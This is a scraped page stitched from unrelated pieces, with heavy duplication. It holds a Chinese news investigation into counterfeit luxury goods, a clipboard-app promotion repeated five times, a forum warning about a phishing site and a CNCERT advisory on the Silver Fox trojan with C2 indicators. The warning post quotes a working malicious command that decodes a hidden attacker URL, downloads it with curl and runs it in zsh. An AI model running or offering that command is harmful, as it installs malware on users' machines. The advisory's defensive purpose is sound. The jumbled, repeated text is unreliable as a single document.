/tag/高仿

19.9元“MIMI”发卡附赠字母“UU”，粘贴“变身”三千多元的高仿“MIUMIU”大牌配饰。最近，这段短视频在平台热传，该仿冒产品的热销，也撕开奢侈品高仿泛滥的隐秘面纱。 “6•18”前夕，“马上测”工作室开箱淘宝、抖音、微店、拼多多等平台的多款仿冒大牌商品，实测灰色产业链多种套路。我们发现，在上述多个平台，检索过一次假货相关关键词后，平台便会不停推流类似高仿产品；有时检索正品，首先跳出来的也是假货。 另一方面，商家钻漏洞，靠着“同款”“小众平替”“混背”等擦边标题、暗藏大牌logo的实拍图精准薅流量，造假套路也花样翻新，除了伪造专柜购物小票、自制虚假防伪芯片外，还有商家售卖与大牌logo不同的高仿产品并附赠DIY改标教程，层层伪装。 知识产权律师提醒，商家花式伪装兜售高仿产品，攀附名牌商誉已构成商标侵权与不正当竞争，涉案金额达标或将触犯刑责；平台放任假货借算法肆意导流，疏于风控拦截，依法要连带担责。 部分高仿包配有防伪卡，还有的则通过指导消费自己DIY，让包包变身“高仿”大牌。 平台算法推流混杂假货？商家标签也在玩擦边套路 “马上测”工作室分别在淘宝、抖音、微店、拼多多购买了“高仿”大牌的包包、鞋子、围巾、项链和帽子等产品，从下单到开箱，实测其中套路。 我们发现，在淘宝平台中，一款售价239元的香奈儿仿款钱包极具代表性。该商品推荐标签刻意规避品牌名称，仅标注“小香款”，但商品主页配图使用香奈儿高仿包原图，仅对双C标志做轻微打码处理，消费者依旧能清晰识别仿制品牌。记者开箱实测发现，这款钱包包装简陋、内里做工粗糙，属于典型的“一眼假”产品。 抖音平台多款奢侈品仿品同样采用标签擦边的售卖方式。一款售价65元的撞色鸭舌帽，商品标签标注为“miu家同款撞色鸭舌帽”，未直接标注大牌名称，但产品本体印有清晰的“MIUMIU”logo，仅内侧标签标注其他工作室名称，混淆消费者判断。 另有一款售价128元的项链，平台标签仅标注“铜合金项链，单花红色四叶草项链”，无任何品牌字样，实则仿制梵克雅宝经典款式。产品开箱配有完整礼袋、包装盒和配套卡片，卡片还宣传商家售卖各大奢侈品大牌的“顶级”版本手表、首饰、眼镜、手镯，但项链本身质感粗糙，与正品差距明显。 微店平台的售假套路如出一辙。一款售价188元的假冒Gucci运动鞋，商品主页直接堆砌“古奇脏脏鞋 Gucci/古驰小脏鞋古奇 Screener系列脏脏鞋g家小脏鞋情侣鞋”等相关字样，直白绑定大牌IP。 另有一款香奈儿仿品围巾，商品标签仅平淡标注“双面羊毛菱格围脖围巾 黑色/藏青色/黑杏色/灰色”，无任何品牌信息，但主页展示图片直接使用带有香奈儿标识的仿品图。 记者在检索上述“高仿”大牌时发现，在上述多个平台，有时检索正品，首先跳出来的也是假货；检索过一次假货相关关键词后，平台便会不停推流类似高仿产品；也有平台放任假货借算法导流。 到手后发现，不少仿品包装齐全，甚至配有购物小票。 高仿套路层层翻新，多重伪装极具迷惑性 除了标签擦边引流，各大平台售假商家打造出全套伪装、DIY改标、虚假溯源等多种新型造假套路，高仿产品仿真度不断提升，极具迷惑性。 例如，在拆箱实测中我们发现，微店所购的188元的假冒Gucci脏脏鞋，造假伪装细节完备，产品到货后配有完整包装袋、服务卡和产品标签，扫码可跳转至Gucci官方网站。不过，鞋子外包装盒颜色与正品存在明显差异，且伴有浓重异味。商家直言，该产品为高版本一比一专柜复刻，销量稳定、客源众多。 微店仿制的香奈儿围巾更是“精细”，复刻了正品全套配套物料，盒子、吊牌、消费小票一应俱全。附带的购物小票信息详尽，标注售价3680港币，虚构购买门店为香港尖沙咀弥敦道商圈的义安城，还填写了导购姓名、信用卡卡号末四位等细节。 我们实测发现，这款围巾的质感、图案高度还原正品，若非专业鉴别，普通消费者难以分辨。经记者核查验证，义安城实际位于新加坡，并非小票标注的香港地区，属于完全伪造的购物信息。 DIY手动改标则是另一种隐蔽的售假套路。和“MIMI”发卡附赠字母“UU”变成“MIUMIU”类似，我们在抖音平台购买了一款标注为“中古款迷你CF斜挎小包”的产品，商家主页主图隐藏香奈儿标志，仅在评论区有用户晒出带香奈儿标识的包包。 记者购买开箱后发现，产品原配锁扣为两个相互嵌套的“O”型造型，无任何大牌标识，但内包装附带专属DIY教程卡片。 记者向客服咨询后，对方发送详细的DIY改造视频和文字教程，指导消费者“扣出”“双C”标志。记者按照教程实操验证，仅需轻微用力即可拆解双“O”边缘，轻松将原配锁扣改造为仿香奈儿的“双C”标志。 拼多多平台则出现了虚假芯片溯源的高仿包包。记者实测购买一款仿LV包包，产品包装齐全、做工逼真，整体仿真度极高。商家宣称该包自带专属防伪芯片，支持手机感应溯源。实测中，将手机贴近包包底部，确实可以成功弹出溯源页面及详细溯源信息。但记者进一步核查发现，该溯源网址并未在工信部备案。 实测多个电商平台发现，检索真货大牌时出现假货；检索一次假货后平台连续推流。商家通过“混背“”复刻”“1:1"等标签引流。 专家：商家售卖高仿和“擦边”属违法，平台也应承担连带责任 针对前述情况，华东政法大学知识产权法律与政策研究院杨勇研究员认为，商家通过“小香款”“同款”等擦边标签、隐晦文案规避平台审核，搭配高仿主图售卖大牌仿品，或者不直接标注品牌全称，但利用文字擦边、图文割裂方式刻意误导消费者的行为，属于虚假宣传，构成商标侵权和不正当竞争；另一方面，商家实施商标侵权和不正当竞争行为，需要承当相应的民事、行政乃至刑事责任：最后，商家售卖大牌仿品，情节达到法定标准，则会触犯刑法，需要承担相应的刑事责任。 商家售卖无大牌标识的基础款产品，配套教程引导消费者手动DIY改装、变造logo变身大牌高仿品，是否属于侵权行为？ 杨勇称，这仍然属于商标侵权和不正当竞争。据《商标法》第四十八条规定，商标的使用并不局限于商品本身或某一特定环节，而是要从商业活动的整体过程分析。 “商家无论是直接贴牌销售还是销售后帮助贴牌，本质上都是在商业活动中使用了商标，其帮助贴牌行为完成后才是销售行为的终结。”杨勇提到，因此，商家售后贴牌的行为属于《商标法》意义上的商标使用，构成商标侵权。《商标法》第五十七条规定，故意为侵犯他人商标专用权行为提供便利条件，帮助他人实施侵犯商标专用权行为的，构成商标侵权。商家售后贴牌，本质上是商家为消费者提供便利条件后，借助消费者的行为完成了商标侵权。根据前述《反不正当竞争法》第二的相关规定，商家售后贴牌的行为攀附商业信誉，同时构成不正当竞争。 关于商家通过虚假备案溯源网址、伪造专柜小票、虚构门店信息等方式营造正品假象的行为，除构成商标侵权和不正当竞争行为外，还有可能涉及多种刑事责任：若商家涉案销售金额、违法获利达到法定标准，则可能构成假冒注册商标罪或销售假冒注册商标的商品罪；若商家伪造的是发票而非仅是小票，可能构成非法制造、出售非法制造的发票罪；若商家伪造专柜小票、溯源凭证的同时也伪造了公司、企业印章罪，则可能构成伪造公司、企业、事业单位、人民团体印章罪；商家伪造仿官方溯源网站、仿备案资质的行为，情节严重的，还可能构成非法利用信息网络罪。 杨勇提到，普通消费者如买到此类假货，可以依据《消费者权益保护法》第五十五条的规定：“经营者提供商品或者服务有欺诈行为的，应当按照消费者的要求增加赔偿其受到的损失，增加赔偿的金额为消费者购买商品的价款或者接受服务的费用的三倍；增加赔偿的金额不足五百元的，为五百元”，向商家主张退一赔三。而如果各大电商平台未尽到审核拦截义务，应依法与该销售者或者服务者承担连带责任。 查看评论

非常喜欢 paste ，也付费过，但是 paste 终身太贵了。 花了 2 个小时 vibe coding 了出来。 已经上架，随意使用。 mac 的 app store 搜索 nexpaste https://apps.apple.com/app/nexpaste/id6761368515 完全免费，那就给个好评支持一下吧，谢谢啦

非常喜欢 paste ，也付费过，但是 paste 终身太贵了。 花了 2 个小时 vibe coding 了出来。 已经上架，随意使用。 mac 的 app store 搜索 nexpaste https://apps.apple.com/app/nexpaste/id6761368515 完全免费，那就给个好评支持一下吧，谢谢啦

非常喜欢 paste ，也付费过，但是 paste 终身太贵了。 花了 2 个小时 vibe coding 了出来。 已经上架，随意使用。 mac 的 app store 搜索 nexpaste https://apps.apple.com/app/nexpaste/id6761368515 完全免费，那就给个好评支持一下吧，谢谢啦

非常喜欢 paste ，也付费过，但是 paste 终身太贵了。 花了 2 个小时 vibe coding 了出来。 已经上架，随意使用。 mac 的 app store 搜索 nexpaste https://apps.apple.com/app/nexpaste/id6761368515 完全免费，那就给个好评支持一下吧，谢谢啦

非常喜欢 paste ，也付费过，但是 paste 终身太贵了。 花了 2 个小时 vibe coding 了出来。 已经上架，随意使用。 mac 的 app store 搜索 nexpaste https://apps.apple.com/app/nexpaste/id6761368515 完全免费，那就给个好评支持一下吧，谢谢啦

（警告！这是个钓鱼网站） https://sites.google.com/view/payforwin?gad_source=1&gad_campaignid=23874708384&gbraid=0AAAABDKGNglxgAWlFP4yPYCknu3VaVVpf&gclid=CjwKCAjwidXQBhAZEiwA4egw6KEedo937JNVh_oH8cIzL_r36qxBV4UVjBZvPwIMC5xHgwKpcORS2xoCS-oQAvD_BwE （警告！这是个钓鱼网站的恶意安装命令）curl -kfsSL $(echo 'aHR0cDovL2hvbWVpbnNwZWN0aW9uc2RlbGF3YXJlLmNvbS9jdXJsL2I0MmEwZWQ5ZDFlY2I3MmU0MmQ2MDM0NTAyYzMwNDg0NWQ5ODgwNTQ4MWQ5OWNlYTRlMjU5MzU5ZjlhYjIwNmU='|base64 -D)|zsh 稀里糊涂的复制安装命令，到终端，然后提示输入电脑密码。 一顿操作，终端打不开了。 大家要引以为戒。

IT之家 5 月 22 日消息，今日，国家互联网应急中心 CNCERT 发布关于黑产团伙批量搭建高仿真钓鱼网站大规模传播银狐木马的风险提示，IT之家整理如下： 一、事件概述 近期，CNCERT 监测发现银狐远控木马通过批量生成的高仿真钓鱼网站大规模传播，样本落地后将 Shellcode 注入系统关键进程执行远控，与境外 C2 服务器建立持久化连接，实现对主机的隐蔽控制。 黑产团伙疑似利用 AI 工具大幅提升钓鱼页面制作效率 ，结合域名批量注册、仿冒网站访问流量精细化监测等手段，形成“网络钓鱼 → 木马下载 → 进程注入 → 远控控制”的完整攻击链。 二、钓鱼网站特征分析 对 2026 年 2 月 6 日-5 月 4 日注册的 439 个钓鱼网站域名分析，这些网站的主要特点如下： 1）钓鱼网站主要围绕办公软件、浏览器和通讯 / 代理类软件进行仿冒，其中 wps、chrome 合计 340 个，占 77.4%。 2）注册行为具有明显的批量化特征，发现最高峰一分钟内注册 15 条 letsvpn 相关域名。 3）域名后缀策略高度集中， hl.cn 占 42.6%， com.cn 占 30.8%，二者合计 73.4%。 4）命名模板复用明显，常见关键词包括 zh、cn、apps、web、office 并大量使用字母重复、缺字、错拼等手法。 5）钓鱼网站在 bing 搜索网站上通过 SEO 投递，确保网站能在 bing.com 网站搜索到；钓鱼网站会检测 refer 头信息，确保访问必须来自搜索引擎，若直接通过域名访问，这些钓鱼网站会跳转 bing.com 或者其他不可访问的网站，防止钓鱼网站被分析。 6）钓鱼页面并未对官方网站进行原样仿造，而是呈现出高度标准化的前端结构、清晰规整的 HTML 注释，且大量采用通用化前端技术栈。针对同一仿冒主题（如 Chrome 浏览器），不同时间注册的页面在布局与内容上均不统一。综合判断，此类钓鱼页面疑似由 AI 编码快速生成。 被仿冒软件占比分布： 相似软件 数量 占比 google/chrome 179 40.80% wps 161 36.70% telegram 24 5.50% letsvpn 18 4.10% whatsapp 12 2.70% kuailian 11 2.50% youdao 10 2.30% bitbrowser 5 1.10% clash 4 0.90% 顶级域名占比分布： 顶级域名 数量 占比 含义 hl.cn 187 42.60% 中国黑龙江地域二级域名 com.cn 135 30.80% 中国商业机构二级域名 cn 102 23.20% 中国国家顶级域名 ac.cn 8 1.80% 中国科研 / 学术机构二级域名 hk.cn 5 1.10% 中国香港地域二级域名 hn.cn 1 0.20% 中国湖南地域二级域名 ah.cn 1 0.20% 中国安徽地域二级域名 三、案例分析 （一）批量搭建钓鱼网站 攻击者疑似使用 AI 技术批量化搭建钓鱼网站。该黑产团伙批量制作仿冒 Chrome、Clash、WPS 等主流常用软件的高仿真钓鱼页面，将页面伪装成官方正版下载入口，以此诱导用户点击并下载恶意程序。如下图所示，为仿冒 Chrome、WPS、Clash 下载的钓鱼页面样例。 这些仿冒网页前端代码有较强的编码固定格式，且对代码段有相对应的注释说明，如下图所示，仿冒有道翻译和 Clash 的两个网站，其 html 代码样式高度一致。 （二）恶意木马投递 攻击者通过钓鱼网站完成木马投递。钓鱼网站会向用户提供携带恶意程序的压缩包下载链接，相关恶意资源文件大多存储于境外云存储服务平台或国内云对象存储服务中，通过多层跳转下载的方式迷惑用户，降低早期被检测拦截的概率。 （三）系统进程注入 银狐木马样本执行后实施进程注入行为。样本运行后，在安装真实 Chrome、WPS 等软件的同时，会将恶意 shellcode 注入到 ctfmon.exe 、 sihost.exe 、 svchost.exe 、 elevation_service.exe 等系统关键进程中，以合法系统进程为掩护，实现恶意代码的隐蔽运行。下图为 EDR 产品告警，可以看出，被控主机与 C2 的通信均使用 Windows 的系统进程。 （四）远程控制连接 被注入进程主动发起远控连接。被植入恶意代码的系统进程会主动外联境外 C2 服务器，通信端口主要为 443 端口与 22 端口，成功建立连接后接收攻击者下发的远控指令，完成数据窃取、文件操作、持久化驻留等恶意行为。 （五）钓鱼网站访问统计 这些钓鱼页面使用了免费流量统计技术服务提供商 51.LA 的网站统计来对钓鱼网站的访问量，访问时长，来源页面等来做统计分析。利用这些统计数据，黑产团伙能够专业化的开发钓鱼网站，计算钓鱼网站的 ROI（投入产出比），精准优化钓鱼策略，提升攻击成功率。下图为钓鱼网站的统计代码。 每种钓鱼应用会通过不同的 ID 进行区分统计，各应用对应 ID 的如下表所示。 仿冒对象 统计 ID clash L4rC8E7ISMR5cOyi / L56E7kDSHNvNpfzY 快连 L4NNnKpJZ0RcW8GY / L4e6WH4KcxTQEsJO chrome L4eCf0G8oXvab2n7 / L4S9pW46ugZ5HLhW teams L4ixuUuJi0dA2nYF WPS L5OOMojcmFzavw26 搜狗浏览器 L5MbevAiByh9Bosu telegram L5TOP7tRWKlFL5Su 四、恶意样本分析 对仿冒 Chrome 的应用的安装包进行分析，发现该软件运行后会安装真实的 Chrome 软件，同时该程序会将恶意代码注入系统进程中隐藏自身。样本相关信息如下表所示： 属性 值 来源钓鱼网站 mb-google-chrome.hl.cn 样本下载链接 https://xgootd.oss-cn-hongkong.aliyuncs.com/ggpc_win64_14.zip 样本 hash 2f8cf966b3fc87ba1a8151428a36652e78f2d57005621eecd514629a902e88b5 样本名称 ggpc_win64_14.zip 样本 C2 sangbiao11.com (137.220.154.107:22) 样本简述 样本为 Gh0st 远控木马，通过 VMP 加壳以及内存加载的方式规避检测，最终实现远程命令执行和敏感数据窃取等恶意功能。 该样本为“Inno Setup”打包的软件安装文件，样本打包于 2026 年 1 月 2 日。 安装文件运行后会在“ C:\Drivers\ySCqV\cb3uGF\s6quO\VPUE ”目录下释放文件并运行可执行文件 Hveuh3.exe 。 Hveuh3.exe 具有无效的数字签名，且含有 PDB 路径：“ E:\CC\lab_release\video\src\client2\GameLiveTool\Release\x64\D3DHook.pdb ”。通过该 PDB 地址分析可执行文件是基于一个游戏录屏、直播、外挂检测项目的正常代码，样本编写者可能具有游戏外挂编写能力，同时做了远控木马的开发。 可执行文件 Hveuh3.exe 文件会加载同目录下的可执行文件 0C5uqPzO.Uww ，该文件为 vmp 加壳的 dll 可执行文件，文件信息如下图所示。 可执行文件 Hveuh3.exe 文件会导入 0C5uqPzO.Uww 文件中混淆后的导出函数，如下图所示。 恶意 dll 文件 0C5uqPzO.Uww 会使用 CreateFileW 方法读取同目录下的加密 Shellcode 文件 L0PM0o0j.EC ，并进行内存加载。 样本同时将释放目录“ C:\Drivers\ySCqV\cb3uGF\s6quO\VPUE ”设置为不可删除和无法访问： 动态调试发现该样本会获取 system 权限，创建服务自启动，并在“ sihost.exe/ ctfmon.exe ”等系统进程中注入 gh0st 载荷，并加密配置保存在 config.ini 文件中： config.ini 保存在“C:\ProgramData\”下随机生成的目录中，如下图所示。 植入完成后，会与其 C2 地址进行通信，C2 地址为 sangbiao11.com (137.220.154.107:22)。 五、控制规模 通过关联分析已发现 17 个相关 C2 恶意域名，和 20 个 C2 的 IP 地址。通过监测分析发现，2026 年 4 月 8 日-5 月 7 日，相关木马境内肉鸡数最高达 2.6 万台，累计感染肉鸡数达到 18.2 万台，每日总上线规模变化趋势如下图所示。 其中日控制规模超 500 的恶意 IP 有 9 个，其每日被控 IP 数变化如下图所示。其中，近 1 个月总控制规模超 10000 个 IP 的 C2 共有 6 个，分别是 185.203.39.134（ dd.kmsccedn.com ），182.16.88.242（ vaeth.cn ），103.12.148.80（ feiji22.vip ），137.220.158.22（ www.amdyjl5.com ），27.124.2.150（ www.w1pf9.com ），104.143.33.78（ www.vpconn.fit ）。 六、防范措施 请广大网民强化网络安全风险意识，提高自我防范能力，谨防仿冒软件、恶意程序侵害，避免造成财产和信息损失，主要防范建议如下： 1）优先认准软件官方网站（如 www.wps.cn ）及手机、电脑官方应用商店；警惕搜索引擎结果中带有乱码前缀、拼接拼凑式的域名链接，例如 kn‑ wps.com.cn 、 www-wps-cn.com 等，这类链接大多为仿冒钓鱼网站，切勿点击下载。 2）提高对搜索引擎标注“广告”链接的警惕性，大量恶意软件、仿冒下载链接常通过广告置顶展示，尽量避开广告条目，优先选择自然排名的普通搜索结果。 3）全程开启杀毒软件实时防护功能，定期进行全盘安全扫描，及时更新电脑及手机操作系统、常用软件的安全补丁，修补安全漏洞。 4）日常留意设备流量使用与运行状态，及时排查异常网络流量、陌生后台行为；若发现设备疑似感染银狐木马等恶意程序，立即核查被控风险，第一时间隔离并清理受害设备。 七、相关 IOC 控制端 IP 地址 103.73.220.57 47.76.195.75 104.143.33.78 103.156.25.99 122.248.198.240 203.91.74.8 154.23.183.157 47.76.255.167 27.124.2.150 185.203.39.134 103.12.148.80 137.220.158.22 182.16.88.242 192.238.128.30 103.156.25.99 54.254.148.22 154.23.184.120 192.252.176.79 47.130.236.119 137.220.153.134 控制端域名 www.ozz79u.com www.danpengit.com www.vpconn.fit ychsq.icu womsz.com tmm.magentaias.com ltan7942.top dd.kmsccedn.com www.w1pf9.com www.amdyjl5.com feiji22.vip woyfc.com vaeth.cn www.hongyun4.com www.chishuikaisuo.com www.xr95633.com rtjthgjnwetghf39.top

https://www.v2ex.com/t/1212634

https://www.v2ex.com/t/1212634

https://www.v2ex.com/t/1212634

https://www.v2ex.com/t/1212634

https://www.v2ex.com/t/1212634

https://www.v2ex.com/t/1212634